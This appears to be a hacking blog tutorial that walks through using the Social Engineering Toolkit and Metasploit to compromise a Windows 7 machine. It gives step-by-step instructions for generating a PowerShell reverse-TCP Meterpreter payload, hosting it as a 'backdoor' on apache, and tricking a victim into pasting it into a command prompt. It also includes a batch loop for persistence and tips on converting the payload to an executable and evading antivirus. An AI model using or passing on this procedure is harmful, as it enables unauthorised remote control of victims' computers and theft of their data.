Hi Today I Wanna Show You How To Hack Windows Using Social Engineering Toolkit.
First You Understand What is Social Engineering Toolkit(SET)
Social Engineer Toolkit (SET) The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. SET was designed to be released with the http://www.social-engineer.org launch and has quickly became a standard tool in a penetration testers arsenal.
Attacker: Kali Linux 2.0
:192.168.164.129
:SET and Metasploit
:apache2
Target: :Windows 7 Ultimate
:192.168.164.130
:SET and Metasploit
:apache2
Target: :Windows 7 Ultimate
:192.168.164.130
Start SET in Kali Linux using the setoolkit or se-toolkit command in terminal or navigate to
Applications > Exploitation Tools > Social Engineering toolkit
You will be welcomed by a banner and several numeric options. We are interested in Social Engineering attacks so we select option 1 by typing 1 in the terminal.
There are many options here, but we are gong with Number 9. Powershell attack vectors. In other Kali Linux version powershell attack vector is Number 10 so don't confuse ..
After selecting No. 9, an explanation of the module is shown and some more options shown. We select option 1 ( Powershell Alphanumeric Shellcode Injector)
And start a listerner by typing “yes”.
NB: Sometimes, you might not like to use the txt version of msfconsole and you opt for armitage/cobaltstrike. Don’t worry.
Its not A must to start the listener, all you have to do is to remember the LHOST and LPORT values you used, start up armitage, set handler using payload as windows/meterpreter/reverse_tcp and the LHOST and LPORT values.
This “yes’ will load a metasploit handler for the payload generated.
NB: Please note the path of your Powershell payload, usually /root/.set/reports/powershell/
Navigate to your /root/.set/reports/powershell/ copy the payload with the .txt extension to /var/www/ and rename it to a simpler name, like bkdoor.txt, (social engineering skills required).
Start apache2 server using service apache2 start
So far if all done correctly, your backdoor is served by apache2 at http://127.0.0.1/bkdoor.txt if bkdoor.txt is what you renamed your payload.
This means the target would access it at http://192.168.164.129/bkdoor.txt for my case. (Note 192.168.164.129 is my Kali Linux LAN IP address)
The URL will show a code that will be copy-pasted in command prompt of the target’s windows PC (with powershell installed. Powershell is installed by default in most modern windows OSes)
So now, if the target copy-pastes the code in cmd, we will get a meterpreter session in our handler.
NB: This is a reverse_tcp connection and therefore a handler must be set before the payload is run. :) .
DONE!!!!
DONE!!!!
Type “help” to view more commands that you can run in meterpreter. Use the post modules in metasploit to exploit the PC more.
ADDITIONAL NOTES:
ADDITIONAL NOTES:
.txt powershell payloads are flexible, in that, you can add more code in them using batch. Save the file as bkdoor.bat (or any other name with .bat extension).
Example:
Example:
1. The following payload will execute after 200 seconds (3 minutes). Good for manual persistence, thouugh it requires many system resources.
@echo off
:loop
//copy-paste your powershell payload here.
Ping 127.0.0.1 -n 200 > %temp%\null
Goto loop
2. The payload could also be converted to an .exe executable (binary file) using advbat2exe converter. (Find a tutorial for this online)
3. This payload is fully FUD.... Does not require any encryption.
We will be getting a reverse TCP connection from the victim machine by using a small backdoor hack windows 7 using metasploit.
ReplyDelete